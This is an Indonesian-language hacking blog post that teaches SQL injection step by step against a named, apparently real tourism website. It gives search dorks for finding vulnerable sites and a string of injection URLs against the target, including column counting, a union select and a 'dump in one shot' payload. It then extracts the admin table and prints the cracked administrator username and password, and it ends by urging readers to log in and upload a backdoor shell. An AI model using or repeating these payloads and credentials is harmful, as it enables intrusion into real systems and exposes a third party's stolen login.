Cara melakukan SQL injection.


-
Hai Sobat.
Saya ikal
Disini, saya akan share cara melakukan SQL injection
-
Lansung saja.
-Dork : inurl:".php?id=" "hotel" + "+91"
             inurl:".php?id=" "berita" + "+62"
-Shell backdoor bisa kalian download dimana saja
Live target?
http://arunatoursbali.com/


>pertama kita cari parameter dari website tersebut
Bisa kalian klik setiap page yang muncul di index
Atau bisa kalian dorking.
-Dorking parameter : site:lon-t.online ".php?

>jika sudah mendapatkan parameter nya,
http://arunatoursbali.com/details_product.php?id=3&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0

>mari kita pastikan website tersebut vuln atau tidak. Beri ' di bagian akhir angka
http://arunatoursbali.com/details_product.php?id=3'&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>terlihat, reredirect (di alihkan ke halaman error404) apakah itu tandanya vuln? Coba kita lanjutkan order by untuk memastikan bahwa itu 404 asli atau hanya tipuan admin saja :'D.

http://arunatoursbali.com/details_product.php?id=3'+order+by+1--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0



>kenapa tidak dialihkan ke halaman error404 lagi? Apakah ini yang dinamakan cinta? :'D
>lanjut kita cari batas column nya, follow me : 

http://arunatoursbali.com/details_product.php?id=3'+order+by+1--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+10--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+11--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> normal

http://arunatoursbali.com/details_product.php?id=3'+order+by+13--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0 ~> error

>okeh, kita mendapatkan error404 kembali di column 13.
>lanjut kita union select, karena kita mendapatkan error404 kembali di angka 13, berarti batas column hanya sampai 12.

http://arunatoursbali.com/details_product.php?id=3'+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>tidak muncul angka togel? Tenang kita tambahkan and 0 sesudah '

http://arunatoursbali.com/details_product.php?id=3'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>dan angka togel sudah muncul, mari kita manfaatkan angka² tersebut untuk memanggil semua hal yang ada di dalam database website tersebut :'D
>saya akan menggunakan Dios (dump in one shoot).
concat(0x3c63656e7465723e3c68313e5b2b5d20496e6a656374656420427920314b346c4c5f2a205b2b5d3c2f68313e3c62723e3c62723e,0x44415441424153453a3a,database(),0x3c62723e,0x555345523a3a,user(),0x3c62723e,0x56455253494f4e3a3a,version(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

>tempel Dios tersebut di angka togel


>user,database,version,dan semua table yang ada di mysql sudah terlihat.
>jika anda mencari username and password admin kalian search in new tab, lalu ketik password atau pass.
>kebetulan diwebsite tersebut kita mendapatkan table ADMIN dengan isi ADMIN_ID,USERNAME,PASSWORD,ID

>lanjut kita dump isi dari table ADMIN.

make_set(6,@:=0x0a,(select(1)from(admin)where@:=make_set(511,@,0x3c6c693e,username,password)),@)


>kenapa error404 lagi? Apakah tidak bisa di panggil? Tenang, kita panggil manual saja, tanpa dios.
Follow me

http://arunatoursbali.com/details_product.php?id=3'+and+0+union+select+1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12+from+admin--+-&title=TANAH_LOT_-_Daily_Bali_Tours#ad-image-0


>username dan password sudah nongol, sekarang kita analysis lalu hash password tersebut.
Hash anaylzer : https://www.tunnelsup.com/hash-analyzer/

>kita mendapatkan
Hash type: MD5 or MD4
>lanjut hash, disini saya menggunakan hashes.com
Found:
882444d50337d5e0d7c285cc6beff267:manager@aruna

>username : manager
>password : manager@aruna

~
Sekarang mari kita cari admin login nya,
Disini saya kasih trik cara menemukan admin login tanpa scan².

>pertama kita pergi ke parameter tadi, dan klik open in new tab images yang ada di page parameter tersebut,
>lalu akses new tab tadi, dan cek url nya.


>apa itu? /manage/ ? Apa itu admin login nya? Mari kita lihat.


>yeay, kita menemukannya.
>sekarang tinggal login dan upload shell backdoor kalian masing².

Ok sekian dari saya.
Jika ada yang ingin di tanyakan silakan chat whatsapp saya.
Nomor? Cari sendiri dong kan hacker :'D

Bye...
Thanks
Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.